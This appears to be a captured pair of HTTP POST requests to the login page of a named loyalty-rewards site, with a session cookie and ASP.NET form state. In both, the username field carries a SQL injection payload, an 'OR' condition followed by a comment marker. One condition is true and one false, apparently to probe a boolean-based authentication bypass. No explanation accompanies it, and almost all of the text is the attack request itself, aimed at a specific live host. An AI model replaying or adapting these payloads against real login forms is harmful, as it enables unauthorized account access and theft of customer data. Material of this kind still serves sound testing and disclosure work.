POST /loyaltyreward/Login.aspx HTTP/2
Host: rewards.roshan.af
Cookie: ASP.NET_SessionId=5cmzp0u1e1b5arzis2q3tsh2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 1187
Origin: https://rewards.roshan.af
Referer: https://rewards.roshan.af/loyaltyreward/Login.aspx
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=9vvc3En330AlDtkMlbCmgv5pnCRc%2B08t2Vr9eovN8szRrdU4OGXZ4nEx9NFKPAtYoRFTQgvUlZVfFdeE1%2FfZGPSIQe0cfTp4sNv6yuAk864%2B48BSx0NBwmaS%2B%2FxzbkbF%2B6Fxq%2F4wAtQhayP4SdLhuptQtnY6rHzpuHmftMguGpO7ij%2BWG5EYEmD0Lb5f7zr450sjmrpSb2f7K5R%2FNuOfdyewHYS1mTzS6ScNK%2FjkZ6yxNA9j8cZk9hTo1DUF05oOXt0jZG9UA0M6mcu19uGF4zZMwJv3t%2FtxaTUat3TR26FtZn9oV3JW0QcPcVdgklyY%2BnYoVBtrKYgGoCf4j5TmwNI6RywYowJJ18szM1tArl5pQc23TCPKrbwrrYNaacQiJutnZVR4h13BDDcY5Yoeqq7ThMtd1b%2FJyKevmI39RjkjpDwHDcmxl6c6t3c9nk5PHiE%2BP3vt4mrKyqGByQ1nRZYC%2BaJBiKtEFNvASuGxfsyh%2FhmEGXbfuvQeVEPFsGdUtRbG4htK3vbAzgPjvREviftQZLfo4EG%2F8uEH8KKRE2jJBDlHj7s%2BESibWAuYeEO6XTxFlWMqmGCK8aYg%2B3U2O%2Bqpzpo%3D&__VIEWSTATEGENERATOR=3A696DA7&__EVENTVALIDATION=13%2FvtPRaTrMym4xveiXQRovMyQap%2BPKBsSBn%2BGvKmw%2BZmCZWDjOs%2FjJC8lKpJTZBQP82AWY4PLZZNwksMW70V26JHcvnNCOSyLP3VdJIcx28r5XRY2650TJqI6v%2FakRPaPXq5KeFg7Co%2B8XuwHSRSci1PnQza7iX5JTIEqDqdo1UllaPErfohLkbMHM7HraSXTHRTdWxg5Ouy0SnKswDEqDAOWc%3D&ctl00%24ContentPlaceHolder1%24lang=1&ctl00%24ContentPlaceHolder1$txtUsername=-1'%20OR%203%2b53%2b53%2b5>3%2b53%2b53%2b5%20--&ctl00%24ContentPlaceHolder1%24txtPassword=AAA&ctl00%24ContentPlaceHolder1%24btnVerify=




__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=9vvc3En330AlDtkMlbCmgv5pnCRc%2B08t2Vr9eovN8szRrdU4OGXZ4nEx9NFKPAtYoRFTQgvUlZVfFdeE1%2FfZGPSIQe0cfTp4sNv6yuAk864%2B48BSx0NBwmaS%2B%2FxzbkbF%2B6Fxq%2F4wAtQhayP4SdLhuptQtnY6rHzpuHmftMguGpO7ij%2BWG5EYEmD0Lb5f7zr450sjmrpSb2f7K5R%2FNuOfdyewHYS1mTzS6ScNK%2FjkZ6yxNA9j8cZk9hTo1DUF05oOXt0jZG9UA0M6mcu19uGF4zZMwJv3t%2FtxaTUat3TR26FtZn9oV3JW0QcPcVdgklyY%2BnYoVBtrKYgGoCf4j5TmwNI6RywYowJJ18szM1tArl5pQc23TCPKrbwrrYNaacQiJutnZVR4h13BDDcY5Yoeqq7ThMtd1b%2FJyKevmI39RjkjpDwHDcmxl6c6t3c9nk5PHiE%2BP3vt4mrKyqGByQ1nRZYC%2BaJBiKtEFNvASuGxfsyh%2FhmEGXbfuvQeVEPFsGdUtRbG4htK3vbAzgPjvREviftQZLfo4EG%2F8uEH8KKRE2jJBDlHj7s%2BESibWAuYeEO6XTxFlWMqmGCK8aYg%2B3U2O%2Bqpzpo%3D&__VIEWSTATEGENERATOR=3A696DA7&__EVENTVALIDATION=13%2FvtPRaTrMym4xveiXQRovMyQap%2BPKBsSBn%2BGvKmw%2BZmCZWDjOs%2FjJC8lKpJTZBQP82AWY4PLZZNwksMW70V26JHcvnNCOSyLP3VdJIcx28r5XRY2650TJqI6v%2FakRPaPXq5KeFg7Co%2B8XuwHSRSci1PnQza7iX5JTIEqDqdo1UllaPErfohLkbMHM7HraSXTHRTdWxg5Ouy0SnKswDEqDAOWc%3D&ctl00%24ContentPlaceHolder1%24lang=1&ctl00%24ContentPlaceHolder1$txtUsername=-1'%20OR%2033>33%20--&ctl00%24ContentPlaceHolder1%24txtPassword=AAA&ctl00%24ContentPlaceHolder1%24btnVerify=